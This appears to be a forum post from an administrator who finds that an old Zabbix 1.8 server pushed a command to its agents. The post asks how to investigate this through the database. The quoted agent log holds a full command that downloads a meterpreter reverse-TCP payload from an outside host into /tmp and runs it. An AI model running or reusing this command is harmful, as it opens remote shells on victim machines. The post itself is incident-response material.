I am in the midst of moving over to Zabbix 2.0. We were still using Zabbix 1.8.

While testing Zabbix 2.0 agents I noticed the following in one of the client agent logs:

15687:20130823:212702.907 Requested [system.run["curl http://www.evilrovot.com/meterpreter_reverse_tcp > /tmp/meterpreter_reverse_tcp ; chmod u+x /tmp/meterpreter_reverse_tcp; ./tmp/meterpreter_reverse_tcp &","nowait"]]
15687:20130823:212702.907 Executing command 'curl http://www.evilrovot.com/meterpreter_reverse_tcp > /tmp/meterpreter_reverse_tcp ; chmod u+x /tmp/meterpreter_reverse_tcp; ./tmp/meterpreter_reverse_tcp &'

Sure enough, there was a meterpreter_reverse_tcp process running.

No matter how many times I killed the proc and removed the /tmp/meterpreter_reverse_tcp it would eventually re-appear.

Scanning all my hosts, I saw this was prevalient on several hosts.

I had thought it was my new Zabbix 2.0 server. But it turns out it was the Zabbix 1.8 server. I figured it out by shutting down the older 1.8 zabbix_server daemon. Since doing that, none of the clients have received the file again.

I want to do some forensic but don't want to turn on the server daemon. Is there a way I could maybe find this in the database?